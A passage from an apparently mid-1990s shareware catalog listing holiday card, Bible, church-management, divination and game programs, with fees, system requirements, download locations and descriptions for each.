Xmas cards, personalize with a + scrolling message up to 255 characters long, and the program + saves your card to a floppy disk. It's written in DOS so send + it to anyone who has access to IBM/compatible EGA/better. The + cards play 10 Xmas carols. It's easy to use and lots of fun to + send and receive! The program is also a great customer + relations device for businesses. Program comes with + instructions on how to order up to 12 different cards for other + holidays and occasions. + + + Product: Computerized Valentine Cards + Author: Impact D. Publishing, 619-346-6609 + Version: 1.1 (10-01-95) + Registration fee: $15.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); 12 + months of unlimited phone, CompuServe, mail support; 1-month + return policy; all ASP-wide offers (see page 6); disks of other + + Chapter 15, "Home & hobby" 576 + + + + shareware; discounts on other products. Free copy of + Computerized Holiday Cards. + Look for: LOVE11.ZIP on BBSs. + Download size: 356k (about 27 minutes with a 2400 baud modem) + Description: + You select from 3 Valentine (2 can also be used as anniversary) + cards, personalize with a scrolling message up to 255 + characters long, and the program saves your card to a floppy + disk. Send the DOS card to anyone who has access to a IBM/ + compatible EGA/better. The cards play several old love songs. + The program is very user friendly and the cards are fun to + create and receive. The program comes with instructions on how + to order up to 12 different cards for other holidays and + occasions. + + Chapter 16, "Religion & philosophy" 577 + + + + + + Chapter 16 + Religion & philosophy + + See also: Home & hobby, Fortune telling & astrology. + + + 16.1 The Bible + + Product: New Testament for Windows + Author: Rocky Mountain Laboratories, 303-679-1662 + Version: 1.61 (04-04-94) + Needs: IBM AT (80286), Windows 3.0 or better. 2000k RAM; EGA + monitor; Hard disk. + Strongly recommended: VGA monitor; Mouse. + Registration fee: $14.95 (add $2.00 for shipping to U.S. + addresses) (add $3.50 for shipping to Canadian addresses) (add + $3.50 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, fax, CompuServe, mail support; + 3-month limited return policy; bonus utilities; discounts on + other products. + Look for: availability unknown on BBSs; NT4W16.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 10 (or contact userID 75540,600 + for assistance). + SWREG#: 2485 + Download size: 680k (about 51 minutes with a 2400 baud modem) + Description: + Features the complete King James text of the New Testament in + an intuitive, easy-to-use, 3D graphical user interface. It + includes powerful text search software, color maps, timeline, + personal notes linked to the corresponding Scripture, tutorial, + context-sensitive help, and study-aids with topical hypertext + links to events, parables and miracles in the life of Christ. + Over 40,000 copies in use. + + Chapter 16, "Religion & philosophy" 578 + + + + 16.1.1 Bible programs + + Product: Bible Timeline + Author: Cascoly Software (Steve Estvanik), 206-523-6135 + Version: 2.14 (03-01-93) + Needs: IBM PC, DOS 2.1 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; CGA + monitor; Hercules monitor. + Strongly recommended: Hard disk; Mouse. + Registration fee: $30.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, CompuServe, mail support; all ASP- + wide offers (see page 6); disks of other shareware; discounts + on other products. + Look for: availability unknown on BBSs; BTL.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 11 (or contact userID 76703,3046 for + assistance). + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + How old was Abraham when Jacob was born? Who were the Kings + of Israel and Judah when the Iliad was written? What Biblical + leaders were alive when the first Olympic games were held? This + lets you sort and selects individual people and events, or + groups and factions, to develop new insights and trace patterns + across different eras and cultures. You can modify or expand + any of the datasets. Useful for sermon research, Bible, + history and art students, teachers, + + + 16.2 For houses of worship + + See also: Database applications. + + Product: ProDev*MEMBER Church System + Author: Pro Dev Software (George Abbott), 616-788-2243 + Version: 3.0g (01-16-95) + Needs: IBM PC, DOS 2.0 or better. 512k RAM; Hard disk. + Registration fee: $50.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of phone, CompuServe, mail support; + 3-month return policy; discounts on upgrades. + Look for: PDMEMB3G.ZIP on BBSs; PDMEMB.EXE on CompuServe in + CIS:PCAPP forum LIBrary 9 (multiple files) (or contact userID + 72617,1266 for assistance). + Download size: 478k (about 36 minutes with a 2400 baud modem) + Description: + Tracks address, children, attendance, giving, jobs, talents and + any information for anyone walking in the church door. Allows + fast posting of giving and attendance. Unlimited text notes + window per member with search features. Many reports, + + Chapter 16, "Religion & philosophy" 579 + + + + statements, labels and rotary file card runs with very flexible + filtering. F1 Help. + + + Product: RANGER TRACKER + Author: Robert Barrentine Consulting, 301-490-7104 + Version: 2.0 (07-08-94) + Needs: IBM PC, DOS 3.0 or better. 510k RAM; Hard disk. + Strongly recommended: HP DeskJet printer; HP LaserJet printer; + Epson printer. + Registration fee: $35.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); lifetime tollfree 800# phone, fax, CompuServe, mail + support; 3-month limited return policy; all ASP-wide offers + (see page 6); disks of other shareware; discounts on upgrades. + 1 free update disk(s) sent out. + Look for: RRTR20.ZIP on BBSs; RRTR20.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 0 (or contact userID 100014,2347 for + assistance). + Download size: 327k (about 25 minutes with a 2400 baud modem) + Description: + A menu-driven program which stores information on the Youth and + Adults of an Outpost. Will generate Ranger and Commander + rosters as well as a roster of former members, mailing labels, + an individual record for each Ranger or Commander, and an + attendance summary for all Rangers. Trackes Advancement, + Advanced Merits earned, Outpost and/or Patrol offices served, + and all training received. + + + Product: Rev. Lowell's Treasury of Humor + Searchable indexed Windows humor collection. See full + description on page 605. + + + 16.3 New age/occult + + Product: ASTRO + Astrology program. See full description on page 525. + + Product: ASTRO For Windows + Astrology program. See full description on page 525. + + Product: By the Numbers + Personality analysis with Numerology. See full description on + page 526. + + Product: Fortune Teller + Seven ways to tell fortunes, plus ESP test. See full + description on page 527. + + Chapter 16, "Religion & philosophy" 580 + + + + Product: Geomancy + Author: R.K. West Consulting (Rosemary K. West) + Version: 4.7 (05-19-95) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $0.00 + Registration benefits: + Look for: GEO47.ZIP on BBSs; GEO.ZIP on CompuServe in CIS:PCVENK + forum LIBrary 9 (or contact userID 74774,403 for assistance). + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + This is an ancient system of divination, sometimes associated + with black magic. Originally based on stones tossed in a + circle, modern Geomancy uses your selection of dot patterns to + create an Astro-Geomantic chart and answer your questions. + Provides an explanation of Geomantic figures. Readings can be + saved, edited, printed. + + + Product: I Ching Empower Tool + The I Ching oracle answers your questions. See full + description on page 527. + + Product: KBBLH120.ZIP + Author: Joseph G. Savino + Version: 1.20 (01-15-96) + Needs: Unknown. 500k RAM; Program can run safely on a system + with no hard disk and only one floppy disk drive; CGA monitor; + Hard disk; HP DeskJet printer; HP LaserJet printer; Mouse; + Epson printer. + Strongly recommended: VGA monitor. + Registration fee: $20.00 + Registration benefits: 31/2" master disk(s); lifetime unlimited + CompuServe, mail support; 2-month return policy; bonus + graphics; all ASP-wide offers (see page 6). 1 free update + disk(s) sent out. + Look for: availability unknown on BBSs; KABAL101.ZIP on + CompuServe in CIS:RELISS forum LIBrary 0; KABAL101.ZIP on GEnie + in NEW AGE forum LIBrary 0. + Download size: 400k (about 30 minutes with a 2400 baud modem) + Description: + An intriguing review of the writings of the famous seer Michel + Nostradamus, then tracing his source of inspiration to an + obscure religion of medieval times. Theoretical in nature, but + providing many new insights into the Kabbalah as well as the + famous prophecies. Hypertext-formatted electronic book with + embedded illustrations. + + + Product: Mayan Calendar + Converts Mayan/modern calendar dates. See full description on + page 528. + + Chapter 16, "Religion & philosophy" 581 + + + + Product: NUMERO UNO + Numerology program. See full description on page 529. + + Product: Personal Tarot + Fortune telling with Tarot cards. See full description on + page 529. + + Product: Quick Fortunes + 4 traditional ways to tell quick fortunes. See full + description on page 530. + + Product: Wynter Stone's I Ching + I CHING fortunes and philosophy. See full description on + page 530. + + Product: Wynter Stone's Quick Guide + Mini-encyclopedia of mystical information. See full + description on page 531. + + Product: Your ESP Test + Find out if you have psychic powers! See full description on + page 531. + + + 16.4 Philosophy + + Product: I Ching Empower Tool + The I Ching oracle answers your questions. See full + description on page 527. + + 16.4.1 Metaphysics + + Product: ASTRO + Astrology program. See full description on page 525. + + Product: ASTRO For Windows + Astrology program. See full description on page 525. + + Product: By the Numbers + Personality analysis with Numerology. See full description on + page 526. + + Product: Fortune Teller + Seven ways to tell fortunes, plus ESP test. See full + description on page 527. + + Product: Geomancy + Ancient system of divination with black magic. See full + description on page 579. + + Product: NUMERO UNO + Numerology program. See full description on page 529. + + Chapter 16, "Religion & philosophy" 582 + + + + Product: Personal Tarot + Fortune telling with Tarot cards. See full description on + page 529. + + Product: Wynter Stone's I Ching + I CHING fortunes and philosophy. See full description on + page 530. + + Product: Your ESP Test + Find out if you have psychic powers! See full description on + page 531. + + + 16.5 Software tools & add-ins + + 16.5.1 For other + + Product: CHRONOS + Interactive historical timelines. See full description on + page 468. + + Product: Word Search Puzzle Maker + Creates shaped printed word search puzzles. See full + description on page 633. + + + 16.6 Other + + Product: Bible Timeline for Windows + Author: Cascoly Software (Steve Estvanik), 206-523-6135 + Version: 1.10 (08-10-95) + Needs: IBM PC, Windows 3.0 or better. + Registration fee: $30.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; WITBTL.ZIP on CompuServe + in CIS:WINPROD forum LIBrary 14 (or contact userID 76703,3046 + for assistance). + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + When were the gospels written? Who ruled Babylon and Egypt + during Biblical times? This lets you sort and selects + individual people and events, or groups and factions, to + develop new insights and trace patterns across different eras + and cultures. You can modify or expand any of the datasets. + + Chapter 16, "Religion & philosophy" 583 + + + + Product: Visual Illustrations + Author: Impact D. Publishing, 619-346-6609 + Version: 1.1 (10-01-95) + Registration fee: $7.00 + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 12 months of unlimited phone, + CompuServe, mail support; 1-month return policy; all ASP-wide + offers (see page 6); discounts on other products. 15 more + object lessons for a total of 25. + Look for: OBJECTLS.ZIP on BBSs. + Download size: 165k (about twelve minutes with a 2400 baud modem) + Description: + This computerized book contains 10 of the most powerful + Christian object lessons you will find anywhere. These easy to + do visually exciting lessons can be used for children's + worship, Sunday School, youth groups, Vacation Bible School, + summer camp, and even sermon starters or illustrations. Some of + the things you will learn from using this book will give you + tools that can be used to create your own exciting visual + effects. Comes complete with graphic diagrams where needed. + + Chapter 17, "Games" 584 + + + + + + Chapter 17 + Games + + See also: Home & hobby, Lottery; Education, Computers, + Educational computer games. + + + 17.1 Adventure + + Product: Dave Dude + Author: APG Entertainment (Christian Naumann and Philipp + Schroeder) + Version: 2.1 (05-14-95) + Needs: IBM 80386, Windows 3.1 or better. 4096k RAM; VGA monitor; + Hard disk; Mouse; XMS memory; VBRUN200.DLL. 640x480x16 video + mode required. + Strongly recommended: sound card. + Registration fee: $18.00 + Registration benefits: Full program functionality; 3 months of + unlimited CompuServe, mail support; bonus game levels; all ASP- + wide offers (see page 6); discounts on upgrades. + Look for: availability unknown on BBSs; DD95.ZIP on CompuServe in + CIS:GAMERS forum LIBrary 2 (or contact userID 100552,1570 for + assistance). + SWREG#: 5654 + PsL#: 11997 + Download size: 777k (about 58 minutes with a 2400 baud modem) + Description: + The first real adventure game for Microsoft Windows. The + newcomer APG released a completely animated game. Nearly the + whole screen is used for graphics. You're controlling Dave Dude + with the mouse; you don't have to enter any text. Just click + around and select actions and objects with your mouse. More + than 15 different screens garantee fun and entertainment for + hours. A must for fans of the LucasArts-Adventures... + + Chapter 17, "Games" 585 + + + + Product: Dave Dude for Win95 + Author: APG Entertainment (Christian Naumann and Philipp + Schroeder) + Version: 2.5 (02-14-96) + Needs: IBM 80386, Windows 95 or better. 4096k RAM; VGA monitor; + Hard disk; Mouse; XMS memory; VBRUN200.DLL. 640x480x16 video + mode required. + Strongly recommended: sound card. + Registration fee: $18.00 + Registration benefits: Full program functionality; 3 months of + unlimited CompuServe, mail support; bonus game levels; all ASP- + wide offers (see page 6); discounts on upgrades. + Look for: availability unknown on BBSs; DUDE32.ZIP on CompuServe + in CIS:GAMERS forum LIBrary 2 (or contact userID 100552,1570 + for assistance). + SWREG#: 5654 + PsL#: 11997 + Download size: 2500k (about 186 minutes with a 2400 baud modem) + Description: + A completely animated adventure game for Windows95 and every + video mode. Nearly the whole screen is used for graphics. You + controll Dave Dude with the mouse; you don't have to enter any + text. Just click around and select actions and objects with + your mouse. More than 15 different screens garantee fun and + entertainment for hours. The story: Dave has spent all his + money on tickets for his vacation. Now he needs to pack... The + rest is up to you! + + + Product: Exile: Escape From the Pit + Author: Spiderweb Software, 908-545-7552 + Version: 1.0.3 (09-08-95) + Needs: IBM 80386, Windows 3.0 or better. 2000k RAM; Hard disk; + Mouse; sound card. + Strongly recommended: VGA monitor. + Registration fee: $25.00 (add $1.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; lifetime unlimited + CompuServe, mail support; all ASP-wide offers (see page 6). + Look for: availability unknown on BBSs. + PsL#: 14127 + Download size: 1700k (about 126 minutes with a 2400 baud modem) + Description: + A huge, highly detailed, intricate fantasy role-playing game. + Explore an enormous outdoors containing almost 80 towns and + dungeons, three game-winning quests, smaller missions, scads of + NPCs, and multitudes of puzzles. The plot? You wander through + Exile, an underground world of long passages and enormous + caverns, containing people banished from the surface world for + the crime of being too different. Your mission? Escape? Gain + power? It's your choice! Great graphics. Compatible with Win95. + + Chapter 17, "Games" 586 + + + + Product: Exile: Escape From the Pit + Author: Spiderweb Software, 908-545-7552 + Version: 1.2 (09-08-95) + Needs: Macintosh, System 7.0.0 or better. 2000k RAM; Hard disk; + Mouse. + Registration fee: $25.00 (add $1.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; lifetime unlimited + CompuServe, mail support; all ASP-wide offers (see page 6). + Look for: availability unknown on BBSs. + Download size: 1400k (about 104 minutes with a 2400 baud modem) + Description: + A huge, highly detailed, intricate fantasy role-playing game. + Explore an enormous outdoors containing almost 80 towns and + dungeons, three game-winning quests, smaller missions, scads of + NPCs, and multitudes of puzzles. The plot? You wander through + Exile, an underground world of long passages and enormous + caverns, containing people banished from the surface world for + the crime of being too different. Your mission? Escape? Gain + power? It's your choice! Great graphics. + + + Product: Puffwort's Evil Scheme + Game reveals deception in tobacco advertising. See full + description on page 476. + + + 17.2 Arcade games + + Product: BOXES + Author: DynoTech Software (David Carlson), 573-774-5001 + Version: 6.0 (01-09-96) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; VGA monitor; + Hard disk; Mouse; VBRUN300.DLL. + Strongly recommended: SVGA monitor; sound card. + Registration fee: $20.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); lifetime unlimited phone, fax, BBS, CompuServe, mail + support; 1-month limited return policy; bonus data; bonus + graphics; bonus game levels; all ASP-wide offers (see page 6); + disks of other shareware; discounts on other products; + discounts on upgrades; registration commissions. + Look for: BOXES60.ZIP on BBSs (call 573-774-5907 to download it + at no charge); BOXES.ZIP on CompuServe in CIS:WINFUN forum + LIBrary 0 (or contact userID 71373,572 for assistance). + SWREG#: 5672 + PsL#: 14051 + Download size: 842k (about 63 minutes with a 2400 baud modem) + Description: + Eliminate colored crates from the playing area by maneuvering + and dropping boxes on them. Unlike many games, instead of + succumbing to increasing speed (since you don't have the + + Chapter 17, "Games" 587 + + + + reflexes of an android), you eventually might solve all levels + [10 Shareware; 150 Champion Edition]. If you are interested in + a game more challenging to your neural transmitters than + punishing to your carpel tunnels, this is the game for you. + But, watch out for falling stones, bombs, and the dreaded anti- + gravity boxes. + + + Product: BOXES II + Align falling boxes with matching crates. See full description + on page 607. + + Product: BOXES III + Align falling Boxes with matching crates. See full description + on page 608. + + Product: O.R.B.Y. + Author: Able Art Software (Al Walters), 604-229-4766 + Version: 1.0 (12-21-93) + Needs: IBM AT (80286), DOS 3.0 or better. 640k RAM; Program can + run safely on a system with no hard disk and only one floppy + disk drive; EGA monitor; Hercules monitor. + Strongly recommended: VGA monitor. + Registration fee: $12.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, mail support. + Look for: ORBY10.ZIP on BBSs (multiple files); ORBY10.ZIP on + CompuServe in CIS:GAMERS forum LIBrary 7 (or contact userID + 71431,1673 for assistance). + Download size: 81k (about six minutes with a 2400 baud modem) + Description: + Orbit Rebound Bankshot Yaw...a game that combines elements of + hockey, billiards, and planetary orbits. Use strategy to score + goals with orbiting planets. Play against another person, or + see if you can beat the computer. Keyboard input, high scores + hall of fame, sound toggle on/off. + + Chapter 17, "Games" 588 + + + + Product: Shooting Gallery + Author: Arcanum Computing (Nels Anderson) + Version: 3.3 (02-07-95) + Needs: IBM PC, DOS 2.1 or better. 640k RAM; VGA monitor; Mouse. + Registration fee: $15.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime BBS, CompuServe, mail support; disks of other + shareware. Bonus sound effects library. + Look for: SHOOTG33.ZIP on BBSs (call 508-788-6951 to download it + at no charge); SHOOTG.ZIP on CompuServe in CIS:GAMERS forum + LIBrary 7 (or contact userID 71020,2613 for assistance). + Download size: 220k (about 17 minutes with a 2400 baud modem) + Description: + An action/arcade game which uses 256 color MCGA graphics mode. + Seven rounds of play are included, with different targets and + objectives on each round. Rounds include arcade shooting range, + skeet, quick draw and wild west shootout. Supports SoundBlaster + for digitzed sound effects. Includes practice mode, high score + hall of fame, extensive statistics, etc. + + + Product: SuperFly + Author: Arcanum Computing (Nels Anderson) + Version: 2.1 (09-01-94) + Needs: IBM PC, DOS 2.1 or better. 512k RAM; EGA monitor. + Registration fee: $15.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime BBS, CompuServe, mail support; bonus game hints. + Look for: SFLY21.ZIP on BBSs (call 508-788-6951 to download it at + no charge); SFLY.ZIP on CompuServe in CIS:GAMERS forum LIBrary + 7 (or contact userID 71020,2613 for assistance). + Download size: 79k (about six minutes with a 2400 baud modem) + Description: + An action game by Nels Anderson, author of Mah Jongg, EGATrek, + etc. Uses hi-res graphics mode and requires an EGA or VGA card + to play. Chase the flies and other insect invaders through 20 + different rounds. Includes 3 levels of difficulty, shell to + DOS, high score hall of fame, etc. Use mouse, joystick or + keyboard to play. + + Chapter 17, "Games" 589 + + + + Product: VIRUS: The Game + Author: DynoTech Software (David Carlson), 573-774-5001 + Version: 1.2 (01-09-96) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; SVGA + monitor; Hard disk; Mouse; VBRUN300.DLL. + Strongly recommended: sound card. + Registration fee: $20.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + newsletter, mail support; 1-month limited return policy; bonus + graphics; bonus game hints; bonus game levels; all ASP-wide + offers (see page 6); disks of other shareware; discounts on + upgrades; registration commissions. + Look for: VIRUS12.ZIP on BBSs (call 573-774-5907 to download it + at no charge); VIRUS.ZIP on CompuServe in CIS:WINFUN forum + LIBrary 0 (or contact userID 71373,572 for assistance). + SWREG#: 7156 + Download size: 1029k (about 77 minutes with a 2400 baud modem) + Description: + A fast knuckle-banging, joint-challenging, finger-flying game + where you are the Virus ("The Bad Guy"). Run recklessly about + the surface of a hard drive while eliminating each sector's + critical bytes. Collect enough bytes to venture to the next + level. Watch for the relentless pursuit of an anti-virus disk + that chases you without restrictions! This fast moving puzzle- + arcade game is not for slackers. Avoid bombs, bad clusters & + other dangers. This is one computer virus you will want to + keep! + + + Product: XFIRE: Action Puzzle game + Action Puzzle game. See full description on page 614. + + + 17.3 Board games + + 17.3.1 Backgammon + + Product: DOC DEFIANT + An original board game similar to Backgammon. See full + description on page 608. + + Chapter 17, "Games" 590 + + + + 17.3.2 Mahjong + + Product: Dragons Bane: Mah Jongg II + Author: Arcanum Computing (Nels Anderson) + Version: 1.2 (03-27-96) + Needs: IBM PC, DOS 3.0 or better. 640k RAM; VGA monitor; Hard + disk. + Strongly recommended: SVGA monitor. + Registration fee: $16.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited fax, BBS, CompuServe, mail support; bonus + utilities; all ASP-wide offers (see page 6). additional tile + sets, board layouts, background pictures. + Look for: DRGNBN12.ZIP on BBSs (call 508-788-6951 to download it + at no charge); DRGNBN.ZIP on CompuServe in CIS:GAMERS forum + LIBrary 20 (or contact userID 71020,2613 for assistance). + Download size: 950k (about 71 minutes with a 2400 baud modem) + Description: + Addictive tile solitaire! Dragons Bane: Mah Jongg II is a + second generation version of the popular tile solitaire game. + It supports both SVGA and VGA graphics and SoundBlaster sound + effects. A wide variety of tiles are available and an editor is + included to make your own. The original "dragon" layout is just + one of many arrangements possible and with the built-in layout + editor there is no limit to the possibilities. Extensive + record keeping is possible for those who like statistics. + + + Product: Mah Jongg-Solitaire + Author: Arcanum Computing (Nels Anderson) + Version: 4.2 (09-01-94) + Needs: IBM PC, DOS 2.1 or better. 512k RAM; EGA monitor; + Hercules monitor. + Strongly recommended: Mouse. + Registration fee: $15.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited BBS, CompuServe, mail support; bonus + utilities. Bonus tile sets & board layouts. + Look for: MAHJNG42.ZIP on BBSs (call 508-788-6951 to download it + at no charge); MAHJNG.ZIP on CompuServe in CIS:GAMERS forum + LIBrary 20 (or contact userID 71020,2613 for assistance). + Download size: 210k (about 16 minutes with a 2400 baud modem) + Description: + A highly addictive solitaire game played with colorful Chinese + tiles. The challenge is to remove all the tiles from the + playing surface. It sounds easy to play (and it is), but + winning is always a challenge. The game supports EGA, VGA and + Hercules graphics, mouse or keyboard input. Supports loadable + tile sets (one extra set included) as well as an editor with + + Chapter 17, "Games" 591 + + + + which players can create their own tiles. Also supports + different board layouts. + + + 17.3.3 Other + + Product: Ancient Yacht + An animated dice game with sound effects. See full description + on page 617. + + Product: Ancient Yacht + An animated dice game with sound effects. See full description + on page 617. + + Product: Backup + Author: Burnham Park Software, Inc., 312-922-6313 + Version: 1.4 (05-21-94) + Needs: IBM AT (80286), Windows 3.1 or better. 1024k RAM; EGA + monitor; Hard disk. + Strongly recommended: VGA monitor. + Registration fee: $12.00 (add $1.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, BBS, CompuServe, mail + support; discounts on other products. Lifetime free upgrading + allowed. + Look for: BACKUP14.ZIP on BBSs (call 312-922-2839 to download it + at no charge); BACKU*.ZIP on CompuServe in CIS:WINFUN forum + LIBrary 3 (or contact userID 71532,3271 for assistance). + Download size: 144k (about eleven minutes with a 2400 baud modem) + Description: + A Windows board game where four opponents compete to become the + first to move all four pieces around the board, Along the way + pieces may be "bumped" or switched. On-line help. + + + Product: BATTLE CHARGE + A two-player strategy game. See full description on page 618. + + Product: COLOR CROSS + An abstract two-player strategy game. See full description on + page 619. + + Chapter 17, "Games" 592 + + + + Product: Econ's Arena + Author: Glen DeBiasa + Version: 1.04 (05-18-95) + Needs: IBM AT (80286), Windows 3.1 or better. Hard disk; Mouse. + Strongly recommended: XMS memory; sound card. + Registration fee: $10.00 (add $2.00 for shipping to U.S. + addresses) (add $6.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited CompuServe, mail support. + Look for: availability unknown on BBSs; EA104A.EXE on CompuServe + in CIS:GAMERS forum LIBrary 4 (or contact userID 70602,3257 for + assistance). + SWREG#: 5913 + Download size: 400k (about 30 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + The elements have declared war on one another and only the + being called Econ can prevent them from destroying their world. + Play as Earth, Air, Fire, or Water on the changing terrain of + Econ's Arena. Control Ogres, Griffons, Dragons, Tritons, and + other mythological pieces. Cast spells imprisoning your foes or + protecting your troops. Play against three friends or the + computer's eight personalities. Collect your elemental tokens + and attack Econ himself... if you dare! + + + Product: Solo Peg + Solo Peg Game for Windows. See full description on page 600. + + + 17.4 Card games + + Product: Bridge Assistant + Author: SoftTech, 071-359-0405 + Version: 3.1 (01-01-96) + Needs: IBM PC, Windows 3.0 or better. 1024k RAM; VGA monitor; + Hard disk; Mouse. + Registration fee: $37.50 + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of + unlimited CompuServe, mail support; all ASP-wide offers (see + page 6); discounts on upgrades. + Look for: availability unknown on BBSs; BRIDGE.ZIP on CompuServe + in CIS:BRIDGE forum LIBrary 0 (or contact userID 100116,3254 + for assistance). + SWREG#: 5740 + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + A bridge program for all bridge players. It enables you to + improve your game by study and practice away from the table. + Has an easy to use interface and extensive context sensitive + + Chapter 17, "Games" 593 + + + + hlep. Can also bid, play and score for rubber bridge. Extensive + tutorial for beginners. + + + Product: CONTRACT BRIDGE + Author: Robert Lindsay Wells, 813-447-0604 + Version: 2.4 (01-17-96) + Needs: IBM PC, DOS 3.0 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Strongly recommended: Hard disk; Mouse; math coprocessor. + Registration fee: $19.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of phone, + CompuServe, newsletter, mail support; 3-month limited return + policy; bonus utilities. 1 free update disk(s) sent out. + Look for: BRIDGE24.ZIP on BBSs; CBRG.ZIP on CompuServe in + CIS:BRIDGE forum LIBrary 12 (or contact userID 120507,3113 for + assistance). + SWREG#: 8281 + Download size: 166k (about 13 minutes with a 2400 baud modem) + Description: + Bids, plays and scores rubber matches of the card game + "Contract Bridge". The user bids and plays the SOUTH hand, and + if NORTH-SOUTH are declarers, the user plays both hands. + Includes customized bidding, and the ability for user to enter + hands. The program is ideal for recreational players who enjoy + informal games of Rubber Bridge, and can be used to learn the + game or sharpen skills. On-line instructions. Mouse supported. + + + Product: Dino Cards + Author: DynoTech Software (David Carlson), 573-774-5001 + Version: 1.0 (01-09-96) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; VGA monitor; + Hard disk; Mouse; VBRUN300.DLL. + Strongly recommended: sound card. + Registration fee: $20.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + newsletter, mail support; 1-month limited return policy; bonus + data; bonus graphics; bonus game levels; all ASP-wide offers + (see page 6); disks of other shareware; discounts on upgrades; + + Chapter 17, "Games" 594 + + + + registration commissions. Free copy of a DynoTech Shareware + game. + Look for: DCARDS10.ZIP on BBSs (call 573-774-5907 to download it + at no charge); DCARDS.ZIP on CompuServe in CIS:WINFUN forum + LIBrary 0 (or contact userID 71373,572 for assistance). + SWREG#: 9436 + Download size: 218k (about 16 minutes with a 2400 baud modem) + Description: + Play five new card games with Jurrassic characters from the + Dino Trilogy of games. Play with Derik the Dinosaur, Rex the + Tyrannosaurus, and Mrs. Rex. Includes two card games. Great for + children ages 5-9. + + + Product: ULTIMATE GIN + Author: Accidental Software, 619-247-2804 + Version: 1.42 (03-15-94) + Needs: IBM PC, DOS 3.1 or better. 540k RAM; EGA monitor; Hard + disk. + Strongly recommended: Mouse. + Registration fee: $10.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, mail support; + bonus utilities; all ASP-wide offers (see page 6); discounts on + other products. + Look for: ULTGIN.ZIP on BBSs. + Download size: 500k (about 37 minutes with a 2400 baud modem) + Awards & nominations: 1994 finalist, PC Magazine/Ziff-Davis + Interactive Shareware Awards. + Description: + Play Gin rummy against one of 4 computer characters. Each has + his or her own style of play and abilities. You can play + standard Gin or 1 of 2 versions of "Okalhoma" gin. You can + even select "Holywood" scoring of disired. Change the points + required for game completion, all bonus scores are adjustable. + Play any player up to 40 games per match, or start a new match + with any player at any time. A unique card holder allows you + to see your hand in melds at a glance. Excellent graphics. + + Chapter 17, "Games" 595 + + + + Product: WCanasta + Author: Wilfried Lotermoser Software + Version: 